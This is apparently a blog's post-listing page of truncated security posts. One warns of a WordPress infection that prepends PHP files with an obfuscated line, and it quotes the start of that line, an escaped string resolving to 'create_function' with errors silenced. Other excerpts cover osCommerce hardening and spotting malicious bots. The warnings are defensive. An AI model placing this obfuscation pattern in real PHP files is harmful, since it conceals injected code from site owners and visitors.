Watch out for a new server infection. No one is sure but it is thought it begins with brute force guessing of a wordpress login.
Then every php file is prepended with:
<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework(
This apparently inserts a malicious snippet of java into your wordpress pages - that you do not see but which infects the user's computer.
At the same…Continue
Posted on June 16, 2013 at 9:39pm
Posted on June 27, 2012 at 10:43am
Steps 1, 2 and 3 are absolutely essential. Step 4 is important if you're using any oscommerce contributions (e.g. community supplied modifications and enhancements) but it is a good idea anyway because it adds extra protection from SQL injection hacks.
Posted on May 5, 2011 at 1:30pm — 9 Comments
It's instructive to watch the various malicious bots troll through your server looking for vulnerabilities. Woe betide you if they find one! Even Wordpress.com has been hacked. Prior to that, at the beginning of this year, a significant number of stand alone Wordpress installations were hacked when their owners did not update to the newest security release.
Here's how you can recognize a malicious bot. If you are using Cpanel, go to "Error Log". You'll see a whole list…Continue
Posted on May 2, 2011 at 2:05pm — 4 Comments